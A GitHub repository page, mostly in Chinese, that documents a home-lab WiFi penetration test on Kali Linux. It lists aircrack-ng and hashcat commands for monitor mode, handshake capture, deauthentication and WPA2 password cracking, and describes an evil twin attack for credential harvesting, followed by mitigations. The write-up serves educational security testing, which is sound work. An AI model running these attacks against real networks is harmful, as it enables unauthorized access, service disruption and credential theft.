armnsec/wireless-security-lab-wifi-pentesting

GitHub: armnsec/wireless-security-lab-wifi-pentesting

一套基于Kali Linux的WiFi渗透测试实验项目,演示WPA2握手包捕获、密码破解、反认证及邪恶双子攻击的完整流程。

Stars: 0 | Forks: 0

# 📡 无线安全实验室 (WiFi 渗透测试) ## 📌 概述 本项目展示了使用大功率外部适配器在受控实验室环境中进行的实际无线安全测试。评估重点包括 WPA2 攻击、客户端断开连接以及恶意接入点利用。 ## 🧰 使用硬件 - 适配器: Alfa AWUS036ACH - 芯片组: RTL8812AU - 功能: 监听模式 + 数据包注入 ## 💻 实验室环境 - 操作系统: Kali Linux - 驱动程序: rtl8812au (已修补以支持监听模式) - 目标: 个人 WiFi 实验室网络 ## 🎯 测试范围 - WPA/WPA2-PSK 安全测试 - 握手包捕获 - 密码破解 - 反认证攻击 - 邪恶双子攻击 ## ⚔️ 攻击方法 ### 1. 开启监听模式 ``` ip link set wlan0 down iw dev wlan0 set type monitor Verify: iw dev 2. Reconnaissance airodump-ng wlan0 Identify target BSSID Note channel & clients 3. Handshake Capture airodump-ng -c --bssid -w capture wlan0 4. Deauthentication Attack aireplay-ng --deauth 10 -a wlan0 Forces client reconnect Captures handshake 5. Password Cracking hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt Result: Password successfully cracked 6. Evil Twin Attack Created fake AP with same SSID Forced victim to connect Captured traffic 🔗 Attack Chain Recon → Monitor Mode → Handshake Capture → Password Crack → Network Access → Evil Twin → Credential Harvesting 🛠 Tools Used Aircrack-ng Suite Hashcat Wireshark iw / ip tools ⚠️ Key Observations RTL8812AU supports injection but requires stable driver Channel mismatch issues may occur Performance depends on driver compatibility 🔐 Impact Unauthorized network access Credential exposure Network disruption 🛡️ Mitigation Use strong WPA2/WPA3 passwords Disable WPS Enable client isolation Monitor deauth attacks ⚠️ Disclaimer This testing was conducted in a controlled lab environment for educational purposes only. ip link set wlan0 up ```
标签:Aircrack-ng, Alfa AWUS036ACH, Bitdefender, DOS头擦除, Evil Twin攻击, Hashcat, RTL8812AU, WiFi渗透测试, WPA2攻击, 中间人攻击, 安全实验, 密码破解, 恶意双胞胎, 握手包抓取, 无线网卡, 监听模式, 网络安全, 网络攻防, 解除认证攻击, 防御绕过, 隐私保护